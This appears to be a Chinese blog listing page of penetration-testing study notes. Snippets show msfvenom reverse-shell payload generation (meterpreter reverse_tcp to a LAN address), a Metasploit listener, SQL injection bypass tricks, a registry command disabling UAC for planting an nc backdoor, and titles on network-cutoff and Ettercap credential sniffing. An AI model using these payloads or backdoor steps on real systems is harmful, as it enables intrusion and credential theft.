安全渗透
兰兰不懒
这个作者很懒,什么都没留下…
展开
-
利用burp的插件 扫描有没有xss漏洞
1.下载bp需要的插件2,这个插件需要一个 老师发的文件3,配置 bp原创 2022-06-20 13:40:38 · 687 阅读 · 0 评论 -
msfvenom
1,msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.55 lport=4444 -f exe > /root/shell.exe2,use exploit/multi/handler 监听模块原创 2022-06-14 14:38:10 · 682 阅读 · 0 评论 -
sql注入 绕过
2.单双引号 注释 过滤3.双写绕过4.关键字过滤5.全部查出来 参数污染 一个成立即可6.空格过滤7.大小写二次注入原创 2022-06-05 14:27:33 · 105 阅读 · 0 评论 -
sql注入 方法大全
sqli 注入 方法原创 2022-06-02 00:49:18 · 531 阅读 · 0 评论 -
sql 方法实例
二,通过 post 抓包 进行Boole盲注(猜库)输入账号密码 使用bp 抓包1.进行Boole盲注(猜库)原创 2022-06-02 00:40:49 · 95 阅读 · 0 评论 -
sql注入
文章目录方法1.注释三种方式————执行过程————一,查看注入点类型 数字还是字符串二,查看有几列三,查看回显位 union四,查一个库下面有几张表+几个列提示:方法 - select database() #所在数据库 - select user() # root@localhost - select version() #mysql 版本 - select @@datadir #mysql 所在路径 - select @原创 2022-05-24 19:47:02 · 175 阅读 · 0 评论 -
通过socks 代理 攻击局域网的电脑
攻击其他局域网内的电脑文章目录前言一、生成木马1.生成木马2.设置监听3.设置reverse payload二、等待目标机上钩之后三、title四、title五、title--------------容易遇到的问题--------------前言提示:123一、生成木马1.生成木马msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp2.设置监听└─# msfdb run msf6 > use原创 2022-05-11 20:18:05 · 890 阅读 · 0 评论 -
frp的使用
一个是服务器和客户机的连接一个是隧道文章目录前言一、下载frp二、建立连接1.服务器配置 frps.ini2.kali配置 frpc.ini三、建立ssh连接1.服务器配置 frps.ini2.kali配置 frpc.ini四、建立web内网映射 并且 建立仪表盘1.服务器配置 frps.ini2.kali配置 frpc.ini--------------容易遇到的问题--------------前言提示:123一、下载frpwget https://github.com/fatedie原创 2022-05-11 16:57:35 · 915 阅读 · 0 评论 -
生成payload木1马 攻击 linux
需要1.开启httpd2.生成payload 木马3.启动msfdb run 监听4.5.6.开始1.1: 开启httpdnmap install参数说明ADD 添加一个注册表项-v 创建键值-t 键值类型-d 键值的值 // 0:关闭uac 1:开启uac-f 强制修改注册表项收到...原创 2022-05-07 01:43:43 · 562 阅读 · 0 评论 -
通过远峰之蓝给目标机植入nc后门
清除日志获取目标机cmd权限关闭 UAC 1.关闭 UAC 远程限制 2.关闭 UAC通知上传nc.exe 并且 设置nc开机启动4.用kali的nc连接目标开始1. 获取目标机cmd权限通过远峰之蓝获取2. --进入目标shell-- 关闭UAC 1.关闭 UAC 远程限制 2.关闭 UAC通知2.1: 关闭 UAC 远程限制cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Window原创 2022-05-06 22:18:01 · 226 阅读 · 0 评论 -
断网攻击 1.局域网 2.广域网
断网攻击原创 2022-05-02 17:21:11 · 688 阅读 · 0 评论 -
通过 Ettarcap 来获取(局域网内) 明文(账号密码)
通过 Ettarcap 来获取(局域网内) 明文(账号密码)原创 2022-05-02 16:56:29 · 439 阅读 · 0 评论